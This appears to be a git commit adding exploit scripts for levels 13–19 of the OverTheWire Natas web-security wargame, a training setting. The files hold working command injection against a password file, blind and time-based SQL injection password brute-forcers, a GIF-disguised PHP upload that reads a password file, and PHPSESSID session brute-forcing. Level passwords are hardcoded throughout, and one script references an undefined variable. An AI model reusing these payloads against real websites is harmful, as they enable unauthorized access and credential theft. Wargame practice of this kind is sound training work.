web apps and natas

2025-05-02 14:56:10 -04:00 · 2014-10-16 06:14:45 -04:00 · 2014-10-16 06:14:45 -04:00 · fdbba7131b
commit fdbba7131b
parent 8c1733acda
19 changed files with 1888 additions and 18 deletions
--- a/Web_Exploits/OS_Command_Injection/sqli_17_COMMAND_INJ.py
+++ b/Web_Exploits/OS_Command_Injection/sqli_17_COMMAND_INJ.py
@ -0,0 +1,46 @@
+#!/usr/bin/python
+
+__author__ = "bt3gl"
+__email__ = "bt33gl@gmail.com"
+
+
+import requests
+import string
+
+
+def brute_force_password(LENGTH, AUTH, CHARS, URL1, URL2):
+
+        password = ''
+
+        for i in range(1, LENGTH+1):
+            for j in range (len(CHARS)):
+                print("Position %d: Trying %s ..." %(i, CHARS[j]))
+                r = requests.get( ( URL1 + password + CHARS[j] + URL2  ), auth=AUTH)
+
+                if 'bananas' not in r.text:
+                        password += CHARS[j]
+                        print("Password so far: " + password)
+                        break
+
+        return password
+
+
+
+if __name__ == '__main__':
+
+        # authorization: login and password
+        AUTH = ('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')
+
+
+        # BASE64 password and 32 bytes
+        CHARS = string.ascii_letters + string.digits
+        LENGTH = 32
+
+
+        # crafted url
+        URL1 = 'http://natas16.natas.labs.overthewire.org?needle=$(grep -E ^'
+        URL2 = '.* /etc/natas_webpass/natas17)banana&submit=Search'
+
+
+        print(brute_force_password(LENGTH, AUTH, CHARS, URL1, URL2))
+
--- a/Web_Exploits/SQLi/sqli_16_brute_force_password.py
+++ b/Web_Exploits/SQLi/sqli_16_brute_force_password.py
@ -0,0 +1,45 @@
+#!/usr/bin/python
+
+__author__ = "bt3gl"
+__email__ = "bt33gl@gmail.com"
+
+import requests
+import string
+
+
+def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD):
+
+        password = ''
+
+        for i in range(1, LENGTH+1):
+            for j in range (len(CHARS)):
+
+                r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] ), auth=AUTH)
+                print r.url
+
+                if KEYWORD in r.text:
+                        password += CHARS[j]
+                        print("Password so far: " + password)
+                        break
+
+        return password
+
+
+
+if __name__ == '__main__':
+
+        # authorization: login and password
+        AUTH = ('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
+
+
+        # BASE64 password and 32 bytes
+        CHARS = string.ascii_letters + string.digits
+        LENGTH = 32
+
+        # crafted url option
+        SQL_URL1 = 'http://natas15.natas.labs.overthewire.org?username=natas16" AND SUBSTRING(password,'
+        SQL_URL2 = ',1) LIKE BINARY "'
+        KEYWORD = 'exists'
+
+        print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD))
+
--- a/Web_Exploits/SQLi/sqli_18_timed_SQLi.py
+++ b/Web_Exploits/SQLi/sqli_18_timed_SQLi.py
@ -0,0 +1,46 @@
+#!/usr/bin/python
+
+__author__ = "bt3gl"
+__email__ = "bt33gl@gmail.com"
+
+import requests
+import string
+
+
+def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2):
+
+        password = ''
+
+        for i in range(1, LENGTH+1):
+            for j in range (len(CHARS)):
+                r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] + SQL_URL3 ), auth=AUTH)
+                time =  r.elapsed.total_seconds()
+
+                print("Position %d: trying %s... Time: %.3f" %(i, CHARS[j], time))
+                #print r.url
+                if time >= 9:
+                    password += CHARS[j]
+                    print("Password so far: " + password)
+                    break
+
+        return password
+
+
+
+if __name__ == '__main__':
+
+        # authorization: login and password
+        AUTH = ('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')
+
+
+        # BASE64 password and 32 bytes
+        CHARS = string.ascii_letters + string.digits
+        LENGTH = 32
+
+        # crafted url option 1
+        SQL_URL1 = 'http://natas17.natas.labs.overthewire.org?username=natas18" AND SUBSTRING(password,'
+        SQL_URL2 = ',1) LIKE BINARY "'
+        SQL_URL3 = '" AND SLEEP(10) AND "1"="1'
+
+        print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2))
+
--- a/Web_Exploits/php/exploit_13.php
+++ b/Web_Exploits/php/exploit_13.php
@ -0,0 +1,5 @@
+GIF89a
+<?php
+readfile('/etc/natas_webpass/natas14
+'); 
+?>
--- a/Web_Exploits/user_id/sqli_19_cookie_auth.py
+++ b/Web_Exploits/user_id/sqli_19_cookie_auth.py
@ -0,0 +1,34 @@
+#!/usr/bin/python
+
+__author__ = "bt3gl"
+__email__ = "bt33gl@gmail.com"
+
+import requests
+
+
+def brute_force_password(AUTH, URL, PAYLOAD, MAXID):
+
+    for i in range(MAXID):
+        HEADER ={'Cookie':'PHPSESSID=' + str(i)}
+        r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER)
+        print(i)
+
+        if "You are an admin" in r.text:
+            print(r.text)
+            print(r.url)
+
+
+
+
+if __name__ == '__main__':
+
+    AUTH = ('natas18', 'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP')
+    URL = 'http://natas18.natas.labs.overthewire.org/index.php?'
+
+    PAYLOAD = ({'debug': '1', 'username': 'user', 'password': 'pass'})
+    MAXID = 640
+
+    brute_force_password(AUTH, URL, PAYLOAD, MAXID)
+
+
+
--- a/Web_Exploits/user_id/sqli_20_user_id_2.py
+++ b/Web_Exploits/user_id/sqli_20_user_id_2.py
@ -0,0 +1,45 @@
+#!/usr/bin/python
+
+__author__ = "bt3gl"
+__email__ = "bt33gl@gmail.com"
+
+import requests
+
+
+def brute_force_password(AUTH, URL, PAYLOAD, MAXID):
+
+    for i in range(MAXID):
+        HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')}
+        r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER)
+        print(i)
+
+        if "You are an admin" in r.text:
+            print(r.text)
+            print(r.url)
+
+
+if __name__ == '__main__':
+
+    AUTH = ('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs')
+    URL = 'http://natas19.natas.labs.overthewire.org/index.php?'
+
+    PAYLOAD = ({'debug': '1', 'username': 'admin', 'password': 'pass'})
+    MAXID = 640
+
+    brute_force_password(AUTH, URL, PAYLOAD, MAXID)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+